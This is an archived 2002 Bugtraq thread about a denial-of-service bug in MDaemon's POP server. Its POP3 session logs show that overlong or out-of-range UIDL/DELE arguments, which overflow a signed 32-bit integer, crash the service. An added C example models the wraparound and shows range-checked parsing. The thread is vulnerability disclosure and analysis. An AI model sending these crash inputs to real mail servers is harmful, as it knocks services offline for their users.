Bugtraq mailing list archives
RE: MDaemon SMTP/POP/IMAP server DoS
From: "Robert Feldbauer" <wuher () swrpg net>
Date: Tue, 29 Oct 2002 11:30:46 -0500
I'm running MDaemon 3.1.2 and this does not have any adverse effect. Here's my log:

+OK daisydata.com POP3 server ready <MDAEMON-F200210291127.AA274532MD3626 () mydomain com>
USER myusername
+OK myusername... Recipient ok
PASS mypassword
+OK myusername () mydomain com's mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648
UIDL 2147483649
+OK -2147483647
UIDL 2147483650
+OK -2147483646

And it responds to "QUIT" just fine.

Bob Feldbauer
wuher () swrpg net
-----Original Message-----
From: Basil Hussain [mailto:basil.hussain () kodakweddings com]
Sent: Tuesday, October 29, 2002 5:27 AM
To: bugtraq () securityfocus com
Subject: RE: MDaemon SMTP/POP/IMAP server DoS

Hi all,

> Bug found in MDaemon's pop-server. It's possible to kill MDaemon by sending long arguments (32b and above) with DELE or UIDL commands. To do this you must have at least mail-account on vulnerable host. After getting long request from client, all MDaemon's Services will be closed (smtp, imap, pop, (?)worldclient). Here the log of attack on local MDaemon POP-server:
>
> +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210 271036.AA3656130MD0012 () dark ru>
> USER D4rkGr3y
> +OK D4rkGr3y... Recipient ok
> PASS cool-pass
> +OK D4rkGr3y () dark ru's mailbox has 1 total messages (18356 octets).
> UIDL 11111111111111111111111111111111

It would appear this is not an issue with the length of string passed to MDaemon, but rather an integer overflow problem. After some testing, I've discovered that if you pass any number greater than 2147483647 (the limit for a signed 4-byte integer), you either get an error or a complete crash of MDaemon. For example:

+OK somedomain.com POP MDaemon 6.0.5 ready <MDAEMON-F200210290951.AA5138234MD2795 () somedomain com>
USER blah
+OK blah... Recipient ok
PASS 123456
+OK blah () somedomain com's mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648 !!! Index 0 is not used
UIDL 2147483649
[Connection lost at this point...]

By the way, you may have noticed this also works with a slightly older release (6.0.5). Also, hostname and account details have been changed to protect the guilty... :-)

Also, I don't know whether this was something with how my test W2K server was set up, but MDaemon would auto-restart afterwards, thus making this bug not so much of a show-stopper and limiting scope for a Denial-of-Service attack somewhat.

Regards,
Basil Hussain
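The wraparound visible in both logs above (UIDL 2147483648 answered with -2147483648), shown next to a range-checked parser that rejects such arguments before they are used as a message index. This is an added example, not part of the thread and not MDaemon's code: naive_msgnum and strict_msgnum are hypothetical names, and the 32-bit accumulator without a range check is an assumption that merely reproduces the logged values.

```c
#include <stdint.h>
#include <stdio.h>

/* Model of the wraparound seen in the logs. Assumption: a 32-bit
 * accumulator with no range check; the server's real code is not shown. */
int32_t naive_msgnum(const char *arg)
{
    uint32_t u = 0;
    for (; *arg >= '0' && *arg <= '9'; arg++)
        u = u * 10u + (uint32_t)(*arg - '0');   /* wraps modulo 2^32 */
    if (u <= (uint32_t)INT32_MAX)
        return (int32_t)u;
    return (int32_t)(u - 0x80000000u) + INT32_MIN; /* two's complement view */
}

/* Strict parser: digits only, no overflow, 1 <= n <= msg_count.
 * Returns 0 and stores n on success, -1 on any rejection. */
int strict_msgnum(const char *arg, int32_t msg_count, int32_t *out)
{
    int32_t n = 0;
    if (arg == NULL || *arg == '\0')
        return -1;
    for (; *arg != '\0'; arg++) {
        if (*arg < '0' || *arg > '9')
            return -1;                 /* sign, space or junk */
        int32_t d = *arg - '0';
        if (n > (INT32_MAX - d) / 10)
            return -1;                 /* next step would pass INT32_MAX */
        n = n * 10 + d;
    }
    if (n < 1 || n > msg_count)
        return -1;                     /* "-ERR no such message" case */
    *out = n;
    return 0;
}

int main(void)
{
    /* Arguments taken from the logs in this thread; mailbox size 1 is constructed. */
    const char *args[] = { "1", "2147483647", "2147483648", "2147483649",
                           "11111111111111111111111111111111" };
    for (size_t i = 0; i < sizeof args / sizeof args[0]; i++) {
        int32_t n = 0;
        int rc = strict_msgnum(args[i], 1, &n);
        printf("UIDL %s: naive=%ld strict=%s\n", args[i],
               (long)naive_msgnum(args[i]), rc == 0 ? "accept" : "reject");
    }
    return 0;
}
```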
Current thread:
- MDaemon SMTP/POP/IMAP server DoS D4rkGr3y (Oct 28)
- RE: MDaemon SMTP/POP/IMAP server DoS Basil Hussain (Oct 29)
- RE: MDaemon SMTP/POP/IMAP server DoS Robert Feldbauer (Oct 29)
- <Possible follow-ups>
- Re: MDaemon SMTP/POP/IMAP server DoS Muhammad Faisal Rauf Danka (Oct 29)
- RE: MDaemon SMTP/POP/IMAP server DoS Basil Hussain (Oct 30)
- RE: MDaemon SMTP/POP/IMAP server DoS Basil Hussain (Oct 29)